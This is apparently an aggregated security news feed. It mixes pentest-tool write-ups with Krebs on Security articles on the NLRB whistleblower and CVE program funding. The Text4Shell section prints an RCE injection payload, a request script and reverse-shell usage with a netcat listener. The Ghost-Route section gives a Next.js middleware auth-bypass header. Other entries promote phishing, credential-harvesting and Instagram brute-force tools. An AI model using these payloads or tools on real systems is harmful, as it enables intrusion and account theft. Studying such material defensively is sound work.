Send notifications to Discord on successful XSS findings:

vulnknox -u "https://example.com/page?param=value" -dw "https://discord.com/api/webhooks/your/webhook/url"

Advanced Usage

Test both GET and POST methods with CheckPoC enabled:

vulnknox -u "https://example.com/page" -X BOTH -checkpoc

Use a proxy and increase the number of retries:

vulnknox -u "https://example.com/page?param=value" -proxy "http://127.0.0.1:8080" -r 5

Suppress the banner and only show successful XSS payloads:

vulnknox -u "https://example.com/page?param=value" -no-banner -s

Output Explanation

[ XSS! ]: Indicates a successful XSS payload was found.
[ SAFE ]: No XSS vulnerability was found in the target.
[ ERR! ]: An error occurred during the request.
[ SKIP ]: The domain or URL was skipped due to multiple failed attempts (e.g., after receiving too many 403 Forbidden responses as specified by the -sb option).
[BALANCE]: Indicates your current API usage with KNOXSS, showing how many API calls you've used out of your total allowance.

The tool also provides a summary at the end of execution, including the number of requests made, successful XSS findings, safe responses, errors, and any skipped domains.

Contributing

Contributions are welcome! If you have suggestions for improvements or encounter any issues, please open an issue or submit a pull request.

License

This project is licensed under the MIT License.

Credits

@KN0X55
@BruteLogic
@xnl_h4ck3r



☐ ☆ ✇ Security – Cisco Blog

Black Hat Asia 2025: Innovation in the SOC

By: Jessica (Bair) Oppenheimer — April 24th 2025 at 12:00
Cisco is the Security Cloud Provider to the Black Hat conferences. Learn about the latest innovations for the SOC of the Future.
☐ ☆ ✇ KitPloit - PenTest Tools!

PEGASUS-NEO - A Comprehensive Penetration Testing Framework Designed For Security Professionals And Ethical Hackers. It Combines Multiple Security Tools And Custom Modules For Reconnaissance, Exploitation, Wireless Attacks, Web Hacking, And More

By: Unknown — April 24th 2025 at 12:30


[ASCII art banner: PEGASUS-NEO]

PEGASUS-NEO Penetration Testing Framework

 

🛡️ Description

PEGASUS-NEO is a comprehensive penetration testing framework designed for security professionals and ethical hackers. It combines multiple security tools and custom modules for reconnaissance, exploitation, wireless attacks, web hacking, and more.

⚠️ Legal Disclaimer

This tool is provided for educational and ethical testing purposes only. Usage of PEGASUS-NEO for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state, and federal laws.

Developers assume no liability and are not responsible for any misuse or damage caused by this program.

🔒 Copyright Notice

PEGASUS-NEO - Advanced Penetration Testing Framework
Copyright (C) 2024 Letda Kes dr. Sobri. All rights reserved.

This software is proprietary and confidential. Unauthorized copying, transfer, or
reproduction of this software, via any medium is strictly prohibited.

Written by Letda Kes dr. Sobri <muhammadsobrimaulana31@gmail.com>, January 2024

🌟 Features

Password: Sobri

  • Reconnaissance & OSINT
    • Network scanning
    • Email harvesting
    • Domain enumeration
    • Social media tracking

  • Exploitation & Pentesting
    • Automated exploitation
    • Password attacks
    • SQL injection
    • Custom payload generation

  • Wireless Attacks
    • WiFi cracking
    • Evil twin attacks
    • WPS exploitation

  • Web Attacks
    • Directory scanning
    • XSS detection
    • SQL injection
    • CMS scanning

  • Social Engineering
    • Phishing templates
    • Email spoofing
    • Credential harvesting

  • Tracking & Analysis
    • IP geolocation
    • Phone number tracking
    • Email analysis
    • Social media hunting

🔧 Installation

# Clone the repository
git clone https://github.com/sobri3195/pegasus-neo.git

# Change directory
cd pegasus-neo

# Install dependencies
sudo python3 -m pip install -r requirements.txt

# Run the tool
sudo python3 pegasus_neo.py

📋 Requirements

  • Python 3.8+
  • Linux Operating System (Kali/Ubuntu recommended)
  • Root privileges
  • Internet connection

🚀 Usage

  1. Start the tool:

sudo python3 pegasus_neo.py

  2. Enter the authentication password
  3. Select a category from the main menu
  4. Choose a specific tool or module
  5. Follow the on-screen instructions

🔐 Security Features

  • Source code protection
  • Integrity checking
  • Anti-tampering mechanisms
  • Encrypted storage
  • Authentication system

🛠️ Supported Tools

Reconnaissance & OSINT

  • Nmap
  • Wireshark
  • Maltego
  • Shodan
  • theHarvester
  • Recon-ng
  • SpiderFoot
  • FOCA
  • Metagoofil

Exploitation & Pentesting

  • Metasploit
  • SQLmap
  • Commix
  • BeEF
  • SET
  • Hydra
  • John the Ripper
  • Hashcat

Wireless Hacking

  • Aircrack-ng
  • Kismet
  • WiFite
  • Fern Wifi Cracker
  • Reaver
  • Wifiphisher
  • Cowpatty
  • Fluxion

Web Hacking

  • Burp Suite
  • OWASP ZAP
  • Nikto
  • XSStrike
  • Wapiti
  • Sublist3r
  • DirBuster
  • WPScan

📝 Version History

  • v1.0.0 (2024-01) - Initial release
  • v1.1.0 (2024-02) - Added tracking modules
  • v1.2.0 (2024-03) - Added tool installer

👥 Contributing

This is a proprietary project and contributions are not accepted at this time.

🤝 Support

For support, please email muhammadsobrimaulana31@gmail.com or visit https://lynk.id/muhsobrimaulana

⚖️ License

This project is protected under proprietary license. See the LICENSE file for details.

Made with ❤️ by Letda Kes dr. Sobri



☐ ☆ ✇ Troy Hunt

You'll Soon Be Able to Sign in to Have I Been Pwned (but Not Login, Log in or Log On)

By: Troy Hunt — April 24th 2025 at 05:48

How do seemingly little things manage to consume so much time?! We had a suggestion this week that instead of being able to login to the new HIBP website, you should instead be able to log in. This initially confused me because I've been used to logging on to things for decades:


So, I went and signed in (yep, different again) to X and asked the masses what the correct term was:

When accessing your @haveibeenpwned dashboard, which of the following should you do? Preview screen for reference: https://t.co/9gqfr8hZrY

— Troy Hunt (@troyhunt) April 23, 2025

Which didn't result in a conclusive victor, so, I started browsing around.

Cloudflare's Zero Trust docs contain information about customising the login page, which I assume you can do once you log in:


Another, uh, "popular" site prompts you to log in:


After which you're invited to sign in:


You can log in to Canva, which is clearly indicated by the HTML title, which suggests you're on the login page:


You can log on to the Commonwealth Bank down here in Australia:


But the login page for ANZ bank requires to log in, unless you've forgotten your login details:


Ah, but many of these are just the difference between the noun "login" (the page is a thing) and the verb "log in" (when you perform an action), right? Well... depends who you bank with 🤷‍♂️


And maybe you don't log in or login at all:


Finally, from the darkness of seemingly interchangeable terms that may or may not violate principles of English language, emerged a pattern. You also sign in to Google:


And Microsoft:


And Amazon:


And Yahoo:


And, as I mentioned earlier, X:


And now, Have I Been Pwned:


There are some notable exceptions (Facebook and ChatGPT, for example), but "sign in" did emerge as the frontrunner among the world's most popular sites. If I really start to overthink it, I do feel that "log[whatever]" implies something different to why we authenticate to systems today and is more a remnant of a bygone era. But frankly, that argument is probably no more valid than whether you're doing a verb thing or a noun thing.

☐ ☆ ✇ KitPloit - PenTest Tools!

Text4Shell-Exploit - A Custom Python-based Proof-Of-Concept (PoC) Exploit Targeting Text4Shell (CVE-2022-42889), A Critical Remote Code Execution Vulnerability In Apache Commons Text Versions < 1.10

By: Unknown — April 23rd 2025 at 12:30


A custom Python-based proof-of-concept (PoC) exploit targeting Text4Shell (CVE-2022-42889), a critical remote code execution vulnerability in Apache Commons Text versions < 1.10. This exploit targets vulnerable Java applications that use the StringSubstitutor class with interpolation enabled, allowing injection of ${script:...} expressions to execute arbitrary system commands.

In this PoC, exploitation is demonstrated via the data query parameter; however, the vulnerable parameter name may vary depending on the implementation. Users should adapt the payload and request path accordingly based on the target application's logic.

Disclaimer: This exploit is provided for educational and authorized penetration testing purposes only. Use responsibly and at your own risk.


Description

This is a custom Python3 exploit for the Apache Commons Text vulnerability known as Text4Shell (CVE-2022-42889). It allows Remote Code Execution (RCE) via insecure interpolators when user input is dynamically evaluated by StringSubstitutor.

Tested against:

  • Apache Commons Text < 1.10.0
  • Java applications using ${script:...} interpolation from untrusted input

Usage

python3 text4shell.py <target_ip> <callback_ip> <callback_port>

Example

python3 text4shell.py 127.0.0.1 192.168.1.2 4444

Make sure to set up a listener on your attacking machine:

nc -nlvp 4444

Payload Logic

The script injects:

${script:javascript:java.lang.Runtime.getRuntime().exec(...)}

The reverse shell is sent via /data parameter using a POST request.
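As a rough Python sketch of the request the PoC builds (the real script injects a reverse shell command built from your callback IP and port; 'id' is a harmless placeholder here, and the vulnerable parameter and path may differ per target):

import requests

# Hedged sketch: POST the Text4Shell interpolation payload to the target.
# The PoC demonstrates injection via the 'data' parameter; adapt to the target app.
target = 'http://127.0.0.1:8080'
payload = "${script:javascript:java.lang.Runtime.getRuntime().exec('id')}"
requests.post(f'{target}/data', data={'data': payload}, timeout=10)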



☐ ☆ ✇ KitPloit - PenTest Tools!

Ghost-Route - Ghost Route Detects If A Next JS Site Is Vulnerable To The Corrupt Middleware Bypass Bug (CVE-2025-29927)

By: Unknown — April 22nd 2025 at 12:30


A Python script to check Next.js sites for corrupt middleware vulnerability (CVE-2025-29927).

The corrupt middleware vulnerability allows an attacker to bypass authentication and access protected routes by sending a custom x-middleware-subrequest header.
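In practice, the check boils down to something like this sketch; the repeated header value is the commonly published bypass payload for this CVE, and the exact value the tool sends may differ by Next.js version:

import requests

# Commonly published bypass value for CVE-2025-29927 (may vary by version)
BYPASS = {'x-middleware-subrequest': 'middleware:middleware:middleware:middleware:middleware'}

url = 'https://example.com/admin'
baseline = requests.get(url, allow_redirects=False)
bypassed = requests.get(url, headers=BYPASS, allow_redirects=False)

# If the protected route normally blocks or redirects but returns 200 with the
# header, the site is likely vulnerable
if baseline.status_code != 200 and bypassed.status_code == 200:
    print('[!] Likely vulnerable to CVE-2025-29927')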

Next.js versions affected:

  • 11.1.4 and up

[!WARNING] This tool is for educational purposes only. Do not use it on websites or systems you do not own or have explicit permission to test. Unauthorized testing may be illegal and unethical.

 

Installation

Clone the repo

git clone https://github.com/takumade/ghost-route.git
cd ghost-route

Create and activate virtual environment

python -m venv .venv
source .venv/bin/activate

Install dependencies

pip install -r requirements.txt

Usage

python ghost-route.py <url> <path> <show_headers>
  • <url>: Base URL of the Next.js site (e.g., https://example.com)
  • <path>: Protected path to test (default: /admin)
  • <show_headers>: Show response headers (default: False)

Example

Basic Example

python ghost-route.py https://example.com /admin

Show Response Headers

python ghost-route.py https://example.com /admin True

License

MIT License

Credits



☐ ☆ ✇ Krebs on Security

Whistleblower: DOGE Siphoned NLRB Case Data

By: BrianKrebs — April 22nd 2025 at 01:48

A security architect with the National Labor Relations Board (NLRB) alleges that employees from Elon Musk‘s Department of Government Efficiency (DOGE) transferred gigabytes of sensitive data from agency case files in early March, using short-lived accounts configured to leave few traces of network activity. The NLRB whistleblower said the unusual large data outflows coincided with multiple blocked login attempts from an Internet address in Russia that tried to use valid credentials for a newly-created DOGE user account.

The cover letter from Berulis’s whistleblower statement, sent to the leaders of the Senate Select Committee on Intelligence.

The allegations came in an April 14 letter to the Senate Select Committee on Intelligence, signed by Daniel J. Berulis, a 38-year-old security architect at the NLRB.

NPR, which was the first to report on Berulis’s whistleblower complaint, says NLRB is a small, independent federal agency that investigates and adjudicates complaints about unfair labor practices, and stores “reams of potentially sensitive data, from confidential information about employees who want to form unions to proprietary business information.”

The complaint documents a one-month period beginning March 3, during which DOGE officials reportedly demanded the creation of all-powerful “tenant admin” accounts in NLRB systems that were to be exempted from network logging activity that would otherwise keep a detailed record of all actions taken by those accounts.

Berulis said the new DOGE accounts had unrestricted permission to read, copy, and alter information contained in NLRB databases. The new accounts also could restrict log visibility, delay retention, route logs elsewhere, or even remove them entirely — top-tier user privileges that neither Berulis nor his boss possessed.

Berulis writes that on March 3, a black SUV accompanied by a police escort arrived at his building — the NLRB headquarters in Southeast Washington, D.C. The DOGE staffers did not speak with Berulis or anyone else in NLRB’s IT staff, but instead met with the agency leadership.

“Our acting chief information officer told us not to adhere to standard operating procedure with the DOGE account creation, and there was to be no logs or records made of the accounts created for DOGE employees, who required the highest level of access,” Berulis wrote of their instructions after that meeting.

“We have built in roles that auditors can use and have used extensively in the past but would not give the ability to make changes or access subsystems without approval,” he continued. “The suggestion that they use these accounts was not open to discussion.”

Berulis found that on March 3 one of the DOGE accounts created an opaque, virtual environment known as a “container,” which can be used to build and run programs or scripts without revealing its activities to the rest of the world. Berulis said the container caught his attention because he polled his colleagues and found none of them had ever used containers within the NLRB network.

Berulis said he also noticed that early the next morning — between approximately 3 a.m. and 4 a.m. EST on Tuesday, March 4  — there was a large increase in outgoing traffic from the agency. He said it took several days of investigating with his colleagues to determine that one of the new accounts had transferred approximately 10 gigabytes worth of data from the NLRB’s NxGen case management system.

Berulis said neither he nor his co-workers had the necessary network access rights to review which files were touched or transferred — or even where they went. But his complaint notes the NxGen database contains sensitive information on unions, ongoing legal cases, and corporate secrets.

“I also don’t know if the data was only 10gb in total or whether or not they were consolidated and compressed prior,” Berulis told the senators. “This opens up the possibility that even more data was exfiltrated. Regardless, that kind of spike is extremely unusual because data almost never directly leaves NLRB’s databases.”

Berulis said he and his colleagues grew even more alarmed when they noticed nearly two dozen login attempts from a Russian Internet address (83.149.30.186) that presented valid login credentials for a DOGE employee account — one that had been created just minutes earlier. Berulis said those attempts were all blocked thanks to rules in place that prohibit logins from non-U.S. locations.

“Whoever was attempting to log in was using one of the newly created accounts that were used in the other DOGE related activities and it appeared they had the correct username and password due to the authentication flow only stopping them due to our no-out-of-country logins policy activating,” Berulis wrote. “There were more than 20 such attempts, and what is particularly concerning is that many of these login attempts occurred within 15 minutes of the accounts being created by DOGE engineers.”

According to Berulis, the naming structure of one Microsoft user account connected to the suspicious activity suggested it had been created and later deleted for DOGE use in the NLRB’s cloud systems: “DogeSA_2d5c3e0446f9@nlrb.microsoft.com.” He also found other new Microsoft cloud administrator accounts with nonstandard usernames, including “Whitesox, Chicago M.” and “Dancehall, Jamaica R.”

A screenshot shared by Berulis showing the suspicious user accounts.

On March 5, Berulis documented that a large section of logs for recently created network resources was missing, and a network watcher in Microsoft Azure was set to the “off” state, meaning it was no longer collecting and recording data as it should have.

Berulis said he discovered someone had downloaded three external code libraries from GitHub that neither NLRB nor its contractors ever use. A “readme” file in one of the code bundles explained it was created to rotate connections through a large pool of cloud Internet addresses that serve “as a proxy to generate pseudo-infinite IPs for web scraping and brute forcing.” Brute force attacks involve automated login attempts that try many credential combinations in rapid sequence.

The complaint alleges that by March 17 it became clear the NLRB no longer had the resources or network access needed to fully investigate the odd activity from the DOGE accounts, and that on March 24, the agency’s associate chief information officer had agreed the matter should be reported to US-CERT. Operated by the Department of Homeland Security’s Cybersecurity and Infrastructure Security Agency (CISA), US-CERT provides on-site cyber incident response capabilities to federal and state agencies.

But Berulis said that between April 3 and 4, he and the associate CIO were informed that “instructions had come down to drop the US-CERT reporting and investigation and we were directed not to move forward or create an official report.” Berulis said it was at this point he decided to go public with his findings.

An email from Daniel Berulis to his colleagues dated March 28, referencing the unexplained traffic spike earlier in the month and the unauthorized changing of security controls for user accounts.

Tim Bearese, the NLRB’s acting press secretary, told NPR that DOGE neither requested nor received access to its systems, and that “the agency conducted an investigation after Berulis raised his concerns but ‘determined that no breach of agency systems occurred.'” The NLRB did not respond to questions from KrebsOnSecurity.

Nevertheless, Berulis has shared a number of supporting screenshots showing agency email discussions about the unexplained account activity attributed to the DOGE accounts, as well as NLRB security alerts from Microsoft about network anomalies observed during the timeframes described.

As CNN reported last month, the NLRB has been effectively hobbled since President Trump fired three board members, leaving the agency without the quorum it needs to function.

“Despite its limitations, the agency had become a thorn in the side of some of the richest and most powerful people in the nation — notably Elon Musk, Trump’s key supporter both financially and arguably politically,” CNN wrote.

Both Amazon and Musk’s SpaceX have been suing the NLRB over complaints the agency filed in disputes about workers’ rights and union organizing, arguing that the NLRB’s very existence is unconstitutional. On March 5, a U.S. appeals court unanimously rejected Musk’s claim that the NLRB’s structure somehow violates the Constitution.

Berulis shared screenshots with KrebsOnSecurity showing that on the day NPR published its story about his claims (April 14), the deputy CIO at NLRB sent an email stating that administrative control had been removed from all employee accounts. Meaning, suddenly none of the IT employees at the agency could do their jobs properly anymore, Berulis said.

An email from the NLRB’s associate chief information officer Eric Marks, notifying employees they will lose security administrator privileges.

Berulis shared a screenshot of an agency-wide email dated April 16 from NLRB director Lasharn Hamilton saying DOGE officials had requested a meeting, and reiterating claims that the agency had no prior “official” contact with any DOGE personnel. The message informed NLRB employees that two DOGE representatives would be detailed to the agency part-time for several months.

An email from the NLRB Director Lasharn Hamilton on April 16, stating that the agency previously had no contact with DOGE personnel.

Berulis told KrebsOnSecurity he was in the process of filing a support ticket with Microsoft to request more information about the DOGE accounts when his network administrator access was restricted. Now, he’s hoping lawmakers will ask Microsoft to provide more information about what really happened with the accounts.

“That would give us way more insight,” he said. “Microsoft has to be able to see the picture better than we can. That’s my goal, anyway.”

Berulis’s attorney told lawmakers that on April 7, while his client and legal team were preparing the whistleblower complaint, someone physically taped a threatening note to Mr. Berulis’s home door with photographs — taken via drone — of him walking in his neighborhood.

“The threatening note made clear reference to this very disclosure he was preparing for you, as the proper oversight authority,” reads a preface by Berulis’s attorney Andrew P. Bakaj. “While we do not know specifically who did this, we can only speculate that it involved someone with the ability to access NLRB systems.”

Berulis said the response from friends, colleagues and even the public has been largely supportive, and that he doesn’t regret his decision to come forward.

“I didn’t expect the letter on my door or the pushback from [agency] leaders,” he said. “If I had to do it over, would I do it again? Yes, because it wasn’t really even a choice the first time.”

For now, Mr. Berulis is taking some paid family leave from the NLRB. Which is just as well, he said, considering he was stripped of the tools needed to do his job at the agency.

“They came in and took full administrative control and locked everyone out, and said limited permission will be assigned on a need basis going forward,” Berulis said of the DOGE employees. “We can’t really do anything, so we’re literally getting paid to count ceiling tiles.”

Further reading: Berulis’s complaint (PDF).

☐ ☆ ✇ KitPloit - PenTest Tools!

TruffleHog Explorer - A User-Friendly Web-Based Tool To Visualize And Analyze Data Extracted Using TruffleHog

By: Unknown — April 18th 2025 at 12:30


Welcome to TruffleHog Explorer, a user-friendly web-based tool to visualize and analyze data extracted using TruffleHog. TruffleHog is one of the most powerful open source tools for secrets discovery, classification, validation, and analysis. In this context, a secret refers to a credential a machine uses to authenticate itself to another machine. This includes API keys, database passwords, private encryption keys, and more.

With an improved UI/UX, powerful filtering options, and export capabilities, this tool helps security professionals efficiently review potential secrets and credentials found in their repositories.

⚠️ This dashboard has been tested only with GitHub TruffleHog JSON outputs. Expect updates soon to support additional formats and platforms.

You can use the online version here: TruffleHog Explorer
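For orientation, a single finding in TruffleHog's GitHub JSON output (for example, from running trufflehog git https://github.com/org/repo.git --json) typically looks like the sketch below. Exact field names vary across TruffleHog versions, so treat this as illustrative rather than authoritative:

{
  "SourceMetadata": {
    "Data": {
      "Git": {
        "commit": "abc123",
        "file": "config/settings.py",
        "repository": "https://github.com/org/repo.git",
        "timestamp": "2025-01-01 00:00:00 +0000"
      }
    }
  },
  "DetectorName": "AWS",
  "Verified": true,
  "Raw": "AKIA...",
  "Redacted": "AKIA********"
}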


🚀 Features

  • Intuitive UI/UX: Beautiful pastel theme with smooth navigation.
  • Powerful Filtering:
    • Filter findings by repository, detector type, and uploaded file.
    • Flexible date range selection with a calendar picker.
    • Verification status categorization for effective review.
    • Advanced search capabilities for faster identification.
  • Batch Operations:
    • Verify or reject multiple findings with a single click.
    • Toggle visibility of rejected results for a streamlined view.
    • Bulk processing to manage large datasets efficiently.
  • Export Capabilities:
    • Export verified secrets or filtered findings effortlessly.
    • Save and load session backups for continuity.
    • Generate reports in multiple formats (JSON, CSV).
  • Dynamic Sorting:
    • Sort results by repository, date, or verification status.
    • Customizable sorting preferences for a personalized experience.

📥 Installation & Usage

1. Clone the Repository

$ git clone https://github.com/yourusername/trufflehog-explorer.git
$ cd trufflehog-explorer

2. Open the index.html

Simply open the index.html file in your preferred web browser.

$ open index.html

📂 How to Use

  1. Upload TruffleHog JSON Findings:
    • Click on the "Load Data" section and select your .json files from TruffleHog output.
    • Multiple files are supported.
  2. Apply Filters:
    • Choose filters such as repository, detector type, and verification status.
    • Utilize the date range picker to narrow down findings.
    • Leverage the search function to locate specific findings quickly.
  3. Review Findings:
    • Click on a finding to expand and view its details.
    • Use the action buttons to verify or reject findings.
    • Add comments and annotations for better tracking.
  4. Export Results:
    • Export verified or filtered findings for reporting.
    • Save session data for future review and analysis.
  5. Save Your Progress:
    • Save your session and resume later without losing any progress.
    • Automatic backup feature to prevent data loss.

Happy Securing! 🔒



☐ ☆ ✇ Security – Cisco Blog

The Need for a Strong CVE Program

By: Omar Santos — April 16th 2025 at 17:53
The CVE program is the foundation for standardized vulnerability disclosure and management. With its future uncertain, global organizations face challenges.
☐ ☆ ✇ KitPloit - PenTest Tools!

Wappalyzer-Next - Python library that uses Wappalyzer extension (and its fingerprints) to detect technologies

By: Unknown — April 16th 2025 at 12:30


This project is a command line tool and Python library that uses the Wappalyzer extension (and its fingerprints) to detect technologies. Other projects that emerged after the discontinuation of the official open source project use outdated fingerprints and lack accuracy when used on dynamic web apps; this project bypasses those limitations.


Installation

Before installing wappalyzer, you will need to install Firefox and geckodriver. Below are detailed steps for setting up geckodriver, but you may use Google/YouTube for help.

Setting up geckodriver

Step 1: Download GeckoDriver

  1. Visit the official GeckoDriver releases page on GitHub:
    https://github.com/mozilla/geckodriver/releases
  2. Download the version compatible with your system:
    • For Windows: geckodriver-vX.XX.X-win64.zip
    • For macOS: geckodriver-vX.XX.X-macos.tar.gz
    • For Linux: geckodriver-vX.XX.X-linux64.tar.gz
  3. Extract the downloaded file to a folder of your choice.

Step 2: Add GeckoDriver to the System Path

To ensure Selenium can locate the GeckoDriver executable:

Windows:
  1. Move geckodriver.exe to a directory (e.g., C:\WebDrivers\).
  2. Add this directory to the system's PATH:
    • Open Environment Variables.
    • Under System Variables, find and select the Path variable, then click Edit.
    • Click New and enter the directory path where geckodriver.exe is stored.
    • Click OK to save.

macOS/Linux:
  1. Move the geckodriver file to /usr/local/bin/ or another directory in your PATH.
  2. Use the following command in the terminal:

sudo mv geckodriver /usr/local/bin/

Ensure /usr/local/bin/ is in your PATH.
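Once the binary is on your PATH, you can confirm that Selenium will be able to locate it; the --version flag prints the installed GeckoDriver release:

$ geckodriver --version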

Install as a command-line tool

pipx install wappalyzer

Install as a library

To use it as a library, install it with pip inside an isolated environment, e.g. venv or docker. You may also pass --break-system-packages to do a 'regular' install, but it is not recommended.

Install with docker

Steps

  1. Clone the repository:
git clone https://github.com/s0md3v/wappalyzer-next.git
cd wappalyzer-next
  2. Build and run with Docker Compose:
docker compose up -d
  3. Scan URLs using the Docker container:
    • Scan a single URL:
docker compose run --rm wappalyzer -i https://example.com
    • Scan a URL and write the results to a JSON file:
docker compose run --rm wappalyzer -i https://example.com -oJ output.json

For Users

Some common usage examples are given below, refer to list of all options for more information.

  • Scan a single URL: wappalyzer -i https://example.com
  • Scan multiple URLs from a file: wappalyzer -i urls.txt -t 10
  • Scan with authentication: wappalyzer -i https://example.com -c "sessionid=abc123; token=xyz789"
  • Export results to JSON: wappalyzer -i https://example.com -oJ results.json

Options

Note: For accuracy use 'full' scan type (default). 'fast' and 'balanced' do not use browser emulation.

  • -i: Input URL or file containing URLs (one per line)
  • --scan-type: Scan type (default: 'full')
    • fast: Quick HTTP-based scan (sends 1 request)
    • balanced: HTTP-based scan with more requests
    • full: Complete scan using the Wappalyzer extension
  • -t, --threads: Number of concurrent threads (default: 5)
  • -oJ: JSON output file path
  • -oC: CSV output file path
  • -oH: HTML output file path
  • -c, --cookie: Cookie header string for authenticated scans

For Developers

The Python library is available on PyPI as wappalyzer and can be imported with the same name.

Using the Library

The main function you'll interact with is analyze():

from wappalyzer import analyze

# Basic usage
results = analyze('https://example.com')

# With options
results = analyze(
    url='https://example.com',
    scan_type='full',  # 'fast', 'balanced', or 'full'
    threads=3,
    cookie='sessionid=abc123'
)

analyze() Function Parameters

  • url (str): The URL to analyze
  • scan_type (str, optional): Type of scan to perform
    • 'fast': Quick HTTP-based scan
    • 'balanced': HTTP-based scan with more requests
    • 'full': Complete scan including JavaScript execution (default)
  • threads (int, optional): Number of threads for parallel processing (default: 3)
  • cookie (str, optional): Cookie header string for authenticated scans

Return Value

Returns a dictionary with the URL as key and detected technologies as value:

{
    "https://github.com": {
        "Amazon S3": {"version": "", "confidence": 100, "categories": ["CDN"], "groups": ["Servers"]},
        "lit-html": {"version": "1.1.2", "confidence": 100, "categories": ["JavaScript libraries"], "groups": ["Web development"]},
        "React Router": {"version": "6", "confidence": 100, "categories": ["JavaScript frameworks"], "groups": ["Web development"]}
    },
    "https://google.com": {},
    "https://example.com": {}
}
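Since the return value is an ordinary dictionary keyed by URL, post-processing is straightforward. Below is a minimal sketch that flattens results of the shape shown above into one line per detected technology (it assumes only the version and confidence fields documented here):

from wappalyzer import analyze

# Scan one site and print a line for each detected technology.
results = analyze('https://example.com', scan_type='fast')

for url, technologies in results.items():
    for name, info in technologies.items():
        version = info.get('version') or 'unknown'
        print(f"{url}: {name} (version {version}, confidence {info.get('confidence')}%)")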

FAQ

Why use Firefox instead of Chrome?

Firefox extensions are .xpi files which are essentially zip files. This makes it easier to extract data and slightly modify the extension to make this tool work.

What is the difference between 'fast', 'balanced', and 'full' scan types?

  • fast: Sends a single HTTP request to the URL. Doesn't use the extension.
  • balanced: Sends additional HTTP requests to .js files and /robots.txt, and does DNS queries. Doesn't use the extension.
  • full: Uses the official Wappalyzer extension to scan the URL in a headless browser.


☐ ☆ ✇ Krebs on Security

Funding Expires for Key Cyber Vulnerability Database

By: BrianKrebs — April 16th 2025 at 03:59

A critical resource that cybersecurity professionals worldwide rely on to identify, mitigate and fix security vulnerabilities in software and hardware is in danger of breaking down. The federally funded, non-profit research and development organization MITRE warned today that its contract to maintain the Common Vulnerabilities and Exposures (CVE) program — which is traditionally funded each year by the Department of Homeland Security — expires on April 16.

A letter from MITRE vice president Yosry Barsoum, warning that the funding for the CVE program will expire on April 16, 2025.

Tens of thousands of security flaws in software are found and reported every year, and these vulnerabilities are eventually assigned their own unique CVE tracking number (e.g. CVE-2024-43573, which is a Microsoft Windows bug that Redmond patched last year).

There are hundreds of organizations — known as CVE Numbering Authorities (CNAs) — that are authorized by MITRE to bestow these CVE numbers on newly reported flaws. Many of these CNAs are country and government-specific, or tied to individual software vendors or vulnerability disclosure platforms (a.k.a. bug bounty programs).

Put simply, MITRE is a critical, widely-used resource for centralizing and standardizing information on software vulnerabilities. That means the pipeline of information it supplies is plugged into an array of cybersecurity tools and services that help organizations identify and patch security holes — ideally before malware or malcontents can wriggle through them.

“What the CVE lists really provide is a standardized way to describe the severity of that defect, and a centralized repository listing which versions of which products are defective and need to be updated,” said Matt Tait, chief operating officer of Corellium, a cybersecurity firm that sells phone-virtualization software for finding security flaws.

In a letter sent today to the CVE board, MITRE Vice President Yosry Barsoum warned that on April 16, 2025, “the current contracting pathway for MITRE to develop, operate and modernize CVE and several other related programs will expire.”

“If a break in service were to occur, we anticipate multiple impacts to CVE, including deterioration of national vulnerability databases and advisories, tool vendors, incident response operations, and all manner of critical infrastructure,” Barsoum wrote.

MITRE told KrebsOnSecurity the CVE website listing vulnerabilities will remain up after the funding expires, but that new CVEs won’t be added after April 16.

A representation of how a vulnerability becomes a CVE, and how that information is consumed. Image: James Berthoty, Latio Tech, via LinkedIn.

DHS officials did not immediately respond to a request for comment. The program is funded through DHS’s Cybersecurity & Infrastructure Security Agency (CISA), which is currently facing deep budget and staffing cuts by the Trump administration. The CVE contract available at USAspending.gov says the project was awarded approximately $40 million last year.

Former CISA Director Jen Easterly said the CVE program is a bit like the Dewey Decimal System, but for cybersecurity.

“It’s the global catalog that helps everyone—security teams, software vendors, researchers, governments—organize and talk about vulnerabilities using the same reference system,” Easterly said in a post on LinkedIn. “Without it, everyone is using a different catalog or no catalog at all, no one knows if they’re talking about the same problem, defenders waste precious time figuring out what’s wrong, and worst of all, threat actors take advantage of the confusion.”

John Hammond, principal security researcher at the managed security firm Huntress, told Reuters he swore out loud when he heard the news that CVE’s funding was in jeopardy, and that losing the CVE program would be like losing “the language and lingo we used to address problems in cybersecurity.”

“I really can’t help but think this is just going to hurt,” said Hammond, who posted a Youtube video to vent about the situation and alert others.

Several people close to the matter told KrebsOnSecurity this is not the first time the CVE program’s budget has been left in funding limbo until the last minute. Barsoum’s letter, which was apparently leaked, sounded a hopeful note, saying the government is making “considerable efforts to continue MITRE’s role in support of the program.”

Tait said that without the CVE program, risk managers inside companies would need to continuously monitor many other places for information about new vulnerabilities that may jeopardize the security of their IT networks. Meaning, it may become more common that software updates get mis-prioritized, with companies having hackable software deployed for longer than they otherwise would, he said.

“Hopefully they will resolve this, but otherwise the list will rapidly fall out of date and stop being useful,” he said.

Update, April 16, 11:00 a.m. ET: The CVE board today announced the creation of a non-profit entity called The CVE Foundation that will continue the program’s work under a new, unspecified funding mechanism and organizational structure.

“Since its inception, the CVE Program has operated as a U.S. government-funded initiative, with oversight and management provided under contract,” the press release reads. “While this structure has supported the program’s growth, it has also raised longstanding concerns among members of the CVE Board about the sustainability and neutrality of a globally relied-upon resource being tied to a single government sponsor.”

The organization’s website, thecvefoundation.org, is less than a day old and currently hosts no content other than the press release heralding its creation. The announcement said the foundation would release more information about its structure and transition planning in the coming days.

Update, April 16, 4:26 p.m. ET: MITRE issued a statement today saying it “identified incremental funding to keep the programs operational. We appreciate the overwhelming support for these programs that have been expressed by the global cyber community, industry and government over the last 24 hours. The government continues to make considerable efforts to support MITRE’s role in the program and MITRE remains committed to CVE and CWE as global resources.”

☐ ☆ ✇ Security – Cisco Blog

From Deployment to Visibility: Cisco Secure Client’s Cloud Transformation

By: Paul Carco — April 15th 2025 at 12:00
Cisco Secure Client can now be deployed and managed via Client Management in Cisco XDR.
☐ ☆ ✇ Security – Cisco Blog

Sign Up for a Tour at the SOC at RSAC™ 2025 Conference

By: Jessica (Bair) Oppenheimer — April 14th 2025 at 12:00
Cisco and Endace provide Security Operations Center services at RSAC™ 2025 Conference. Sign up for a tour and see what happens in the SOC.
☐ ☆ ✇ KitPloit - PenTest Tools!

Instagram-Brute-Force-2024 - Instagram Brute Force 2024 Compatible With Python 3.13 / X64 Bit / Only Chrome Browser

By: Unknown — April 13th 2025 at 12:30


Instagram Brute Force CPU/GPU Supported 2024

(Use option 2 while running the script.)

(Option 1 is under development)

(Chrome must be installed on the device.)

